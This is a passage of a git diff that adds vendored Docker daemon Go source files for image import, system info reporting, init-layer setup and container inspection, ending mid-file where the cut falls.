+	for i, hi := range newImage.History {
+		if i >= len(parentImg.History) {
+			hi.EmptyLayer = true
+		}
+		newImage.History[i] = hi
+	}
+
+	now := time.Now()
+	var historyComment string
+	if len(parent) > 0 {
+		historyComment = fmt.Sprintf("merge %s to %s", id, parent)
+	} else {
+		historyComment = fmt.Sprintf("create new from %s", id)
+	}
+
+	newImage.History = append(newImage.History, image.History{
+		Created: now,
+		Comment: historyComment,
+	})
+	newImage.Created = now
+
+	b, err := json.Marshal(&newImage)
+	if err != nil {
+		return "", errors.Wrap(err, "error marshalling image config")
+	}
+
+	newImgID, err := daemon.imageStore.Create(b)
+	if err != nil {
+		return "", errors.Wrap(err, "error creating new image after squash")
+	}
+	return string(newImgID), nil
+}
+
+func newImage(image *image.Image, virtualSize int64) *types.ImageSummary {
+	newImage := new(types.ImageSummary)
+	newImage.ParentID = image.Parent.String()
+	newImage.ID = image.ID().String()
+	newImage.Created = image.Created.Unix()
+	newImage.Size = virtualSize
+	newImage.VirtualSize = virtualSize
+	newImage.SharedSize = -1
+	newImage.Containers = -1
+	if image.Config != nil {
+		newImage.Labels = image.Config.Labels
+	}
+	return newImage
+}
diff --git a/vendor/github.com/docker/docker/daemon/import.go b/vendor/github.com/docker/docker/daemon/import.go
new file mode 100644
index 0000000000..c93322b92e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/import.go
@@ -0,0 +1,135 @@
+package daemon
+
+import (
+	"encoding/json"
+	"errors"
+	"io"
+	"net/http"
+	"net/url"
+	"runtime"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder/dockerfile"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/reference"
+)
+
+// ImportImage imports an image, getting the archived layer data either from
+// inConfig (if src is "-"), or from a URI specified in src. Progress output is
+// written to outStream. Repository and tag names can optionally be given in
+// the repo and tag arguments, respectively.
+func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error {
+	var (
+		sf     = streamformatter.NewJSONStreamFormatter()
+		rc     io.ReadCloser
+		resp   *http.Response
+		newRef reference.Named
+	)
+
+	if repository != "" {
+		var err error
+		newRef, err = reference.ParseNamed(repository)
+		if err != nil {
+			return err
+		}
+
+		if _, isCanonical := newRef.(reference.Canonical); isCanonical {
+			return errors.New("cannot import digest reference")
+		}
+
+		if tag != "" {
+			newRef, err = reference.WithTag(newRef, tag)
+			if err != nil {
+				return err
+			}
+		}
+	}
+
+	config, err := dockerfile.BuildFromConfig(&container.Config{}, changes)
+	if err != nil {
+		return err
+	}
+	if src == "-" {
+		rc = inConfig
+	} else {
+		inConfig.Close()
+		u, err := url.Parse(src)
+		if err != nil {
+			return err
+		}
+		if u.Scheme == "" {
+			u.Scheme = "http"
+			u.Host = src
+			u.Path = ""
+		}
+		outStream.Write(sf.FormatStatus("", "Downloading from %s", u))
+		resp, err = httputils.Download(u.String())
+		if err != nil {
+			return err
+		}
+		progressOutput := sf.NewProgressOutput(outStream, true)
+		rc = progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Importing")
+	}
+
+	defer rc.Close()
+	if len(msg) == 0 {
+		msg = "Imported from " + src
+	}
+
+	inflatedLayerData, err := archive.DecompressStream(rc)
+	if err != nil {
+		return err
+	}
+	// TODO: support windows baselayer?
+	l, err := daemon.layerStore.Register(inflatedLayerData, "")
+	if err != nil {
+		return err
+	}
+	defer layer.ReleaseAndLog(daemon.layerStore, l)
+
+	created := time.Now().UTC()
+	imgConfig, err := json.Marshal(&image.Image{
+		V1Image: image.V1Image{
+			DockerVersion: dockerversion.Version,
+			Config:        config,
+			Architecture:  runtime.GOARCH,
+			OS:            runtime.GOOS,
+			Created:       created,
+			Comment:       msg,
+		},
+		RootFS: &image.RootFS{
+			Type:    "layers",
+			DiffIDs: []layer.DiffID{l.DiffID()},
+		},
+		History: []image.History{{
+			Created: created,
+			Comment: msg,
+		}},
+	})
+	if err != nil {
+		return err
+	}
+
+	id, err := daemon.imageStore.Create(imgConfig)
+	if err != nil {
+		return err
+	}
+
+	// FIXME: connect with commit code and call refstore directly
+	if newRef != nil {
+		if err := daemon.TagImageWithReference(id, newRef); err != nil {
+			return err
+		}
+	}
+
+	daemon.LogImageEvent(id.String(), id.String(), "import")
+	outStream.Write(sf.FormatStatus("", id.String()))
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/info.go b/vendor/github.com/docker/docker/daemon/info.go
new file mode 100644
index 0000000000..1ab9f29592
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/info.go
@@ -0,0 +1,180 @@
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"runtime"
+	"sync/atomic"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/parsers/operatingsystem"
+	"github.com/docker/docker/pkg/platform"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/registry"
+	"github.com/docker/docker/utils"
+	"github.com/docker/docker/volume/drivers"
+	"github.com/docker/go-connections/sockets"
+)
+
+// SystemInfo returns information about the host server the daemon is running on.
+func (daemon *Daemon) SystemInfo() (*types.Info, error) {
+	kernelVersion := "<unknown>"
+	if kv, err := kernel.GetKernelVersion(); err != nil {
+		logrus.Warnf("Could not get kernel version: %v", err)
+	} else {
+		kernelVersion = kv.String()
+	}
+
+	operatingSystem := "<unknown>"
+	if s, err := operatingsystem.GetOperatingSystem(); err != nil {
+		logrus.Warnf("Could not get operating system name: %v", err)
+	} else {
+		operatingSystem = s
+	}
+
+	// Don't do containerized check on Windows
+	if runtime.GOOS != "windows" {
+		if inContainer, err := operatingsystem.IsContainerized(); err != nil {
+			logrus.Errorf("Could not determine if daemon is containerized: %v", err)
+			operatingSystem += " (error determining if containerized)"
+		} else if inContainer {
+			operatingSystem += " (containerized)"
+		}
+	}
+
+	meminfo, err := system.ReadMemInfo()
+	if err != nil {
+		logrus.Errorf("Could not read system memory info: %v", err)
+		meminfo = &system.MemInfo{}
+	}
+
+	sysInfo := sysinfo.New(true)
+
+	var cRunning, cPaused, cStopped int32
+	daemon.containers.ApplyAll(func(c *container.Container) {
+		switch c.StateString() {
+		case "paused":
+			atomic.AddInt32(&cPaused, 1)
+		case "running":
+			atomic.AddInt32(&cRunning, 1)
+		default:
+			atomic.AddInt32(&cStopped, 1)
+		}
+	})
+
+	securityOptions := []string{}
+	if sysInfo.AppArmor {
+		securityOptions = append(securityOptions, "name=apparmor")
+	}
+	if sysInfo.Seccomp && supportsSeccomp {
+		profile := daemon.seccompProfilePath
+		if profile == "" {
+			profile = "default"
+		}
+		securityOptions = append(securityOptions, fmt.Sprintf("name=seccomp,profile=%s", profile))
+	}
+	if selinuxEnabled() {
+		securityOptions = append(securityOptions, "name=selinux")
+	}
+	uid, gid := daemon.GetRemappedUIDGID()
+	if uid != 0 || gid != 0 {
+		securityOptions = append(securityOptions, "name=userns")
+	}
+
+	v := &types.Info{
+		ID:                 daemon.ID,
+		Containers:         int(cRunning + cPaused + cStopped),
+		ContainersRunning:  int(cRunning),
+		ContainersPaused:   int(cPaused),
+		ContainersStopped:  int(cStopped),
+		Images:             len(daemon.imageStore.Map()),
+		Driver:             daemon.GraphDriverName(),
+		DriverStatus:       daemon.layerStore.DriverStatus(),
+		Plugins:            daemon.showPluginsInfo(),
+		IPv4Forwarding:     !sysInfo.IPv4ForwardingDisabled,
+		BridgeNfIptables:   !sysInfo.BridgeNFCallIPTablesDisabled,
+		BridgeNfIP6tables:  !sysInfo.BridgeNFCallIP6TablesDisabled,
+		Debug:              utils.IsDebugEnabled(),
+		NFd:                fileutils.GetTotalUsedFds(),
+		NGoroutines:        runtime.NumGoroutine(),
+		SystemTime:         time.Now().Format(time.RFC3339Nano),
+		LoggingDriver:      daemon.defaultLogConfig.Type,
+		CgroupDriver:       daemon.getCgroupDriver(),
+		NEventsListener:    daemon.EventsService.SubscribersCount(),
+		KernelVersion:      kernelVersion,
+		OperatingSystem:    operatingSystem,
+		IndexServerAddress: registry.IndexServer,
+		OSType:             platform.OSType,
+		Architecture:       platform.Architecture,
+		RegistryConfig:     daemon.RegistryService.ServiceConfig(),
+		NCPU:               sysinfo.NumCPU(),
+		MemTotal:           meminfo.MemTotal,
+		DockerRootDir:      daemon.configStore.Root,
+		Labels:             daemon.configStore.Labels,
+		ExperimentalBuild:  daemon.configStore.Experimental,
+		ServerVersion:      dockerversion.Version,
+		ClusterStore:       daemon.configStore.ClusterStore,
+		ClusterAdvertise:   daemon.configStore.ClusterAdvertise,
+		HTTPProxy:          sockets.GetProxyEnv("http_proxy"),
+		HTTPSProxy:         sockets.GetProxyEnv("https_proxy"),
+		NoProxy:            sockets.GetProxyEnv("no_proxy"),
+		LiveRestoreEnabled: daemon.configStore.LiveRestoreEnabled,
+		SecurityOptions:    securityOptions,
+		Isolation:          daemon.defaultIsolation,
+	}
+
+	// Retrieve platform specific info
+	daemon.FillPlatformInfo(v, sysInfo)
+
+	hostname := ""
+	if hn, err := os.Hostname(); err != nil {
+		logrus.Warnf("Could not get hostname: %v", err)
+	} else {
+		hostname = hn
+	}
+	v.Name = hostname
+
+	return v, nil
+}
+
+// SystemVersion returns version information about the daemon.
+func (daemon *Daemon) SystemVersion() types.Version {
+	v := types.Version{
+		Version:       dockerversion.Version,
+		GitCommit:     dockerversion.GitCommit,
+		MinAPIVersion: api.MinVersion,
+		GoVersion:     runtime.Version(),
+		Os:            runtime.GOOS,
+		Arch:          runtime.GOARCH,
+		BuildTime:     dockerversion.BuildTime,
+		Experimental:  daemon.configStore.Experimental,
+	}
+
+	kernelVersion := "<unknown>"
+	if kv, err := kernel.GetKernelVersion(); err != nil {
+		logrus.Warnf("Could not get kernel version: %v", err)
+	} else {
+		kernelVersion = kv.String()
+	}
+	v.KernelVersion = kernelVersion
+
+	return v
+}
+
+func (daemon *Daemon) showPluginsInfo() types.PluginsInfo {
+	var pluginsInfo types.PluginsInfo
+
+	pluginsInfo.Volume = volumedrivers.GetDriverList()
+	pluginsInfo.Network = daemon.GetNetworkDriverList()
+	pluginsInfo.Authorization = daemon.configStore.AuthorizationPlugins
+
+	return pluginsInfo
+}
diff --git a/vendor/github.com/docker/docker/daemon/info_unix.go b/vendor/github.com/docker/docker/daemon/info_unix.go
new file mode 100644
index 0000000000..9c41c0e4cd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/info_unix.go
@@ -0,0 +1,82 @@
+// +build !windows
+
+package daemon
+
+import (
+	"context"
+	"os/exec"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+// FillPlatformInfo fills the platform related info.
+func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) {
+	v.MemoryLimit = sysInfo.MemoryLimit
+	v.SwapLimit = sysInfo.SwapLimit
+	v.KernelMemory = sysInfo.KernelMemory
+	v.OomKillDisable = sysInfo.OomKillDisable
+	v.CPUCfsPeriod = sysInfo.CPUCfsPeriod
+	v.CPUCfsQuota = sysInfo.CPUCfsQuota
+	v.CPUShares = sysInfo.CPUShares
+	v.CPUSet = sysInfo.Cpuset
+	v.Runtimes = daemon.configStore.GetAllRuntimes()
+	v.DefaultRuntime = daemon.configStore.GetDefaultRuntimeName()
+	v.InitBinary = daemon.configStore.GetInitPath()
+
+	v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID
+	if sv, err := daemon.containerd.GetServerVersion(context.Background()); err == nil {
+		v.ContainerdCommit.ID = sv.Revision
+	} else {
+		logrus.Warnf("failed to retrieve containerd version: %v", err)
+		v.ContainerdCommit.ID = "N/A"
+	}
+
+	v.RuncCommit.Expected = dockerversion.RuncCommitID
+	if rv, err := exec.Command(DefaultRuntimeBinary, "--version").Output(); err == nil {
+		parts := strings.Split(strings.TrimSpace(string(rv)), "\n")
+		if len(parts) == 3 {
+			parts = strings.Split(parts[1], ": ")
+			if len(parts) == 2 {
+				v.RuncCommit.ID = strings.TrimSpace(parts[1])
+			}
+		}
+
+		if v.RuncCommit.ID == "" {
+			logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultRuntimeBinary, string(rv))
+			v.RuncCommit.ID = "N/A"
+		}
+	} else {
+		logrus.Warnf("failed to retrieve %s version: %v", DefaultRuntimeBinary, err)
+		v.RuncCommit.ID = "N/A"
+	}
+
+	v.InitCommit.Expected = dockerversion.InitCommitID
+	if rv, err := exec.Command(DefaultInitBinary, "--version").Output(); err == nil {
+		parts := strings.Split(strings.TrimSpace(string(rv)), " - ")
+		if len(parts) == 2 {
+			if dockerversion.InitCommitID[0] == 'v' {
+				vs := strings.TrimPrefix(parts[0], "tini version ")
+				v.InitCommit.ID = "v" + vs
+			} else {
+				// Get the sha1
+				gitParts := strings.Split(parts[1], ".")
+				if len(gitParts) == 2 && gitParts[0] == "git" {
+					v.InitCommit.ID = gitParts[1]
+					v.InitCommit.Expected = dockerversion.InitCommitID[0:len(gitParts[1])]
+				}
+			}
+		}
+
+		if v.InitCommit.ID == "" {
+			logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultInitBinary, string(rv))
+			v.InitCommit.ID = "N/A"
+		}
+	} else {
+		logrus.Warnf("failed to retrieve %s version", DefaultInitBinary)
+		v.InitCommit.ID = "N/A"
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/info_windows.go b/vendor/github.com/docker/docker/daemon/info_windows.go
new file mode 100644
index 0000000000..c700911eb0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/info_windows.go
@@ -0,0 +1,10 @@
+package daemon
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+// FillPlatformInfo fills the platform related info.
+func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) {
+}
diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go
new file mode 100644
index 0000000000..66d53f0eef
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go
@@ -0,0 +1,13 @@
+// +build solaris,cgo
+
+package initlayer
+
+// Setup populates a directory with mountpoints suitable
+// for bind-mounting dockerinit into the container. The mountpoint is simply an
+// empty file at /.dockerinit
+//
+// This extra layer is used by all containers as the top-most ro layer. It protects
+// the container from unwanted side-effects on the rw layer.
+func Setup(initLayer string, rootUID, rootGID int) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go
new file mode 100644
index 0000000000..e83c2751ed
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go
@@ -0,0 +1,69 @@
+// +build linux freebsd
+
+package initlayer
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"syscall"
+
+	"github.com/docker/docker/pkg/idtools"
+)
+
+// Setup populates a directory with mountpoints suitable
+// for bind-mounting things into the container.
+//
+// This extra layer is used by all containers as the top-most ro layer. It protects
+// the container from unwanted side-effects on the rw layer.
+func Setup(initLayer string, rootUID, rootGID int) error {
+	for pth, typ := range map[string]string{
+		"/dev/pts":         "dir",
+		"/dev/shm":         "dir",
+		"/proc":            "dir",
+		"/sys":             "dir",
+		"/.dockerenv":      "file",
+		"/etc/resolv.conf": "file",
+		"/etc/hosts":       "file",
+		"/etc/hostname":    "file",
+		"/dev/console":     "file",
+		"/etc/mtab":        "/proc/mounts",
+	} {
+		parts := strings.Split(pth, "/")
+		prev := "/"
+		for _, p := range parts[1:] {
+			prev = filepath.Join(prev, p)
+			syscall.Unlink(filepath.Join(initLayer, prev))
+		}
+
+		if _, err := os.Stat(filepath.Join(initLayer, pth)); err != nil {
+			if os.IsNotExist(err) {
+				if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootUID, rootGID); err != nil {
+					return err
+				}
+				switch typ {
+				case "dir":
+					if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, pth), 0755, rootUID, rootGID); err != nil {
+						return err
+					}
+				case "file":
+					f, err := os.OpenFile(filepath.Join(initLayer, pth), os.O_CREATE, 0755)
+					if err != nil {
+						return err
+					}
+					f.Chown(rootUID, rootGID)
+					f.Close()
+				default:
+					if err := os.Symlink(typ, filepath.Join(initLayer, pth)); err != nil {
+						return err
+					}
+				}
+			} else {
+				return err
+			}
+		}
+	}
+
+	// Layer is ready to use, if it wasn't before.
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go
new file mode 100644
index 0000000000..48a9d71aa5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go
@@ -0,0 +1,13 @@
+// +build windows
+
+package initlayer
+
+// Setup populates a directory with mountpoints suitable
+// for bind-mounting dockerinit into the container. The mountpoint is simply an
+// empty file at /.dockerinit
+//
+// This extra layer is used by all containers as the top-most ro layer. It protects
+// the container from unwanted side-effects on the rw layer.
+func Setup(initLayer string, rootUID, rootGID int) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/inspect.go b/vendor/github.com/docker/docker/daemon/inspect.go
new file mode 100644
index 0000000000..557f639de1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/inspect.go
@@ -0,0 +1,264 @@
+package daemon
+
+import (
+	"fmt"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/api/types/versions/v1p20"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/network"
+)
+
+// ContainerInspect returns low-level information about a
+// container. Returns an error if the container cannot be found, or if
+// there is an error getting the data.
+func (daemon *Daemon) ContainerInspect(name string, size bool, version string) (interface{}, error) {
+	switch {
+	case versions.LessThan(version, "1.20"):
+		return daemon.containerInspectPre120(name)
+	case versions.Equal(version, "1.20"):
+		return daemon.containerInspect120(name)
+	}
+	return daemon.ContainerInspectCurrent(name, size)
+}
+
+// ContainerInspectCurrent returns low-level information about a
+// container in a most recent api version.
+func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	container.Lock()
+	defer container.Unlock()
+
+	base, err := daemon.getInspectData(container, size)
+	if err != nil {
+		return nil, err
+	}
+
+	apiNetworks := make(map[string]*networktypes.EndpointSettings)
+	for name, epConf := range container.NetworkSettings.Networks {
+		if epConf.EndpointSettings != nil {
+			apiNetworks[name] = epConf.EndpointSettings
+		}
+	}
+
+	mountPoints := addMountPoints(container)
+	networkSettings := &types.NetworkSettings{
+		NetworkSettingsBase: types.NetworkSettingsBase{
+			Bridge:                 container.NetworkSettings.Bridge,
+			SandboxID:              container.NetworkSettings.SandboxID,
+			HairpinMode:            container.NetworkSettings.HairpinMode,
+			LinkLocalIPv6Address:   container.NetworkSettings.LinkLocalIPv6Address,
+			LinkLocalIPv6PrefixLen: container.NetworkSettings.LinkLocalIPv6PrefixLen,
+			Ports:                  container.NetworkSettings.Ports,
+			SandboxKey:             container.NetworkSettings.SandboxKey,
+			SecondaryIPAddresses:   container.NetworkSettings.SecondaryIPAddresses,
+			SecondaryIPv6Addresses: container.NetworkSettings.SecondaryIPv6Addresses,
+		},
+		DefaultNetworkSettings: daemon.getDefaultNetworkSettings(container.NetworkSettings.Networks),
+		Networks:               apiNetworks,
+	}
+
+	return &types.ContainerJSON{
+		ContainerJSONBase: base,
+		Mounts:            mountPoints,
+		Config:            container.Config,
+		NetworkSettings:   networkSettings,
+	}, nil
+}
+
+// containerInspect120 serializes the master version of a container into a json type.
+func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	container.Lock()
+	defer container.Unlock()
+
+	base, err := daemon.getInspectData(container, false)
+	if err != nil {
+		return nil, err
+	}
+
+	mountPoints := addMountPoints(container)
+	config := &v1p20.ContainerConfig{
+		Config:          container.Config,
+		MacAddress:      container.Config.MacAddress,
+		NetworkDisabled: container.Config.NetworkDisabled,
+		ExposedPorts:    container.Config.ExposedPorts,
+		VolumeDriver:    container.HostConfig.VolumeDriver,
+	}
+	networkSettings := daemon.getBackwardsCompatibleNetworkSettings(container.NetworkSettings)
+
+	return &v1p20.ContainerJSON{
+		ContainerJSONBase: base,
+		Mounts:            mountPoints,
+		Config:            config,
+		NetworkSettings:   networkSettings,
+	}, nil
+}
+
+func (daemon *Daemon) getInspectData(container *container.Container, size bool) (*types.ContainerJSONBase, error) {
+	// make a copy to play with
+	hostConfig := *container.HostConfig
+
+	children := daemon.children(container)
+	hostConfig.Links = nil // do not expose the internal structure
+	for linkAlias, child := range children {
+		hostConfig.Links = append(hostConfig.Links, fmt.Sprintf("%s:%s", child.Name, linkAlias))
+	}
+
+	// We merge the Ulimits from hostConfig with daemon default
+	daemon.mergeUlimits(&hostConfig)
+
+	var containerHealth *types.Health
+	if container.State.Health != nil {
+		containerHealth = &types.Health{
+			Status:        container.State.Health.Status,
+			FailingStreak: container.State.Health.FailingStreak,
+			Log:           append([]*types.HealthcheckResult{}, container.State.Health.Log...),
+		}
+	}
+
+	containerState := &types.ContainerState{
+		Status:     container.State.StateString(),
+		Running:    container.State.Running,
+		Paused:     container.State.Paused,
+		Restarting: container.State.Restarting,
+		OOMKilled:  container.State.OOMKilled,
+		Dead:       container.State.Dead,
+		Pid:        container.State.Pid,
+		ExitCode:   container.State.ExitCode(),
+		Error:      container.State.Error(),
+		StartedAt:  container.State.StartedAt.Format(time.RFC3339Nano),
+		FinishedAt: container.State.FinishedAt.Format(time.RFC3339Nano),
+		Health:     containerHealth,
+	}
+
+	contJSONBase := &types.ContainerJSONBase{
+		ID:           container.ID,
+		Created:      container.Created.Format(time.RFC3339Nano),
+		Path:         container.Path,
+		Args:         container.Args,
+		State:        containerState,
+		Image:        container.ImageID.String(),
+		LogPath:      container.LogPath,
+		Name:         container.Name,
+		RestartCount: container.RestartCount,
+		Driver:       container.Driver,
+		MountLabel:   container.MountLabel,
+		ProcessLabel: container.ProcessLabel,
+		ExecIDs:      container.GetExecIDs(),
+		HostConfig:   &hostConfig,
+	}
+
+	var (
+		sizeRw     int64
+		sizeRootFs int64
+	)
+	if size {
+		sizeRw, sizeRootFs = daemon.getSize(container)
+		contJSONBase.SizeRw = &sizeRw
+		contJSONBase.SizeRootFs = &sizeRootFs
+	}
+
+	// Now set any platform-specific fields
+	contJSONBase = setPlatformSpecificContainerFields(container, contJSONBase)
+
+	contJSONBase.GraphDriver.Name = container.Driver
+
+	graphDriverData, err := container.RWLayer.Metadata()
+	// If container is marked as Dead, the container's graphdriver metadata
+	// could have been removed, it will cause error if we try to get the metadata,
+	// we can ignore the error if the container is dead.
+	if err != nil && !container.Dead {
+		return nil, err
+	}
+	contJSONBase.GraphDriver.Data = graphDriverData
+
+	return contJSONBase, nil
+}
+
+// ContainerExecInspect returns low-level information about the exec
+// command. An error is returned if the exec cannot be found.
+func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, error) {
+	e, err := daemon.getExecConfig(id)
+	if err != nil {
+		return nil, err
+	}
+
+	pc := inspectExecProcessConfig(e)
+
+	return &backend.ExecInspect{
+		ID:            e.ID,
+		Running:       e.Running,
+		ExitCode:      e.ExitCode,
+		ProcessConfig: pc,
+		OpenStdin:     e.OpenStdin,
+		OpenStdout:    e.OpenStdout,
+		OpenStderr:    e.OpenStderr,
+		CanRemove:     e.CanRemove,
+		ContainerID:   e.ContainerID,
+		DetachKeys:    e.DetachKeys,
+		Pid:           e.Pid,
+	}, nil
+}
+
+// VolumeInspect looks up a volume by name. An error is returned if
+// the volume cannot be found.
+func (daemon *Daemon) VolumeInspect(name string) (*types.Volume, error) {
+	v, err := daemon.volumes.Get(name)
+	if err != nil {
+		return nil, err
+	}
+	apiV := volumeToAPIType(v)
+	apiV.Mountpoint = v.Path()
+	apiV.Status = v.Status()
+	return apiV, nil
+}
+
+func (daemon *Daemon) getBackwardsCompatibleNetworkSettings(settings *network.Settings) *v1p20.NetworkSettings {
+	result := &v1p20.NetworkSettings{
+		NetworkSettingsBase: types.NetworkSettingsBase{
+			Bridge:                 settings.Bridge,
+			SandboxID:              settings.SandboxID,
+			HairpinMode:            settings.HairpinMode,
+			LinkLocalIPv6Address:   settings.LinkLocalIPv6Address,
+			LinkLocalIPv6PrefixLen: settings.LinkLocalIPv6PrefixLen,
+			Ports:                  settings.Ports,
+			SandboxKey:             settings.SandboxKey,
+			SecondaryIPAddresses:   settings.SecondaryIPAddresses,
+			SecondaryIPv6Addresses: settings.SecondaryIPv6Addresses,
+		},
+		DefaultNetworkSettings: daemon.getDefaultNetworkSettings(settings.Networks),
+	}
+
+	return result
+}
+
+// getDefaultNetworkSettings creates the deprecated structure that holds the information
+// about the bridge network for a container.
+func (daemon *Daemon) getDefaultNetworkSettings(networks map[string]*network.EndpointSettings) types.DefaultNetworkSettings {
+	var settings types.DefaultNetworkSettings
+
+	if defaultNetwork, ok := networks["bridge"]; ok && defaultNetwork.EndpointSettings != nil {
+		settings.EndpointID = defaultNetwork.EndpointID
+		settings.Gateway = defaultNetwork.Gateway
+		settings.GlobalIPv6Address = defaultNetwork.GlobalIPv6Address
+		settings.GlobalIPv6PrefixLen = defaultNetwork.GlobalIPv6PrefixLen
+		settings.IPAddress = defaultNetwork.IPAddress
+		settings.IPPrefixLen = defaultNetwork.IPPrefixLen
+		settings.IPv6Gateway = defaultNetwork.IPv6Gateway
+		settings.MacAddress = defaultNetwork.MacAddress
+	}
+	return settings
+}
diff --git a/vendor/github.com/docker/docker/daemon/inspect_solaris.go b/vendor/github.com/docker/docker/daemon/inspect_solaris.go
new file mode 100644
index 0000000000..0e3dcc1119
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/inspect_solaris.go
@@ -0,0 +1,41 @@
+package daemon
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/versions/v1p19"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+)
+
+// This sets platform-specific fields
+func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase {
+	return contJSONBase
+}
+
+// containerInspectPre120 get containers for pre 1.20 APIs.
+func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) {
+	return &v1p19.ContainerJSON{}, nil
+}
+
+func addMountPoints(container *container.Container) []types.MountPoint {
+	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
+	for _, m := range container.MountPoints {
+		mountPoints = append(mountPoints, types.MountPoint{
+			Name:        m.Name,
+			Source:      m.Path(),
+			Destination: m.Destination,
+			Driver:      m.Driver,
+			RW:          m.RW,
+		})
+	}
+	return mountPoints
+}
+
+func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig {
+	return &backend.ExecProcessConfig{
+		Tty:        e.Tty,
+		Entrypoint: e.Entrypoint,
+		Arguments:  e.Args,
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/inspect_unix.go b/vendor/github.com/docker/docker/daemon/inspect_unix.go
new file mode 100644
index 0000000000..08a82235ad
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/inspect_unix.go
@@ -0,0 +1,92 @@
+// +build !windows,!solaris
+
+package daemon
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/versions/v1p19"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+)
+
+// This sets platform-specific fields
+func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase {
+	contJSONBase.AppArmorProfile = container.AppArmorProfile
+	contJSONBase.ResolvConfPath = container.ResolvConfPath
+	contJSONBase.HostnamePath = container.HostnamePath
+	contJSONBase.HostsPath = container.HostsPath
+
+	return contJSONBase
+}
+
+// containerInspectPre120 gets containers for pre 1.20 APIs.
+func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	container.Lock()
+	defer container.Unlock()
+
+	base, err := daemon.getInspectData(container, false)
+	if err != nil {
+		return nil, err
+	}
+
+	volumes := make(map[string]string)
+	volumesRW := make(map[string]bool)
+	for _, m := range container.MountPoints {
+		volumes[m.Destination] = m.Path()
+		volumesRW[m.Destination] = m.RW
+	}
+
+	config := &v1p19.ContainerConfig{
+		Config:          container.Config,
+		MacAddress:      container.Config.MacAddress,
+		NetworkDisabled: container.Config.NetworkDisabled,
+		ExposedPorts:    container.Config.ExposedPorts,
+		VolumeDriver:    container.HostConfig.VolumeDriver,
+		Memory:          container.HostConfig.Memory,
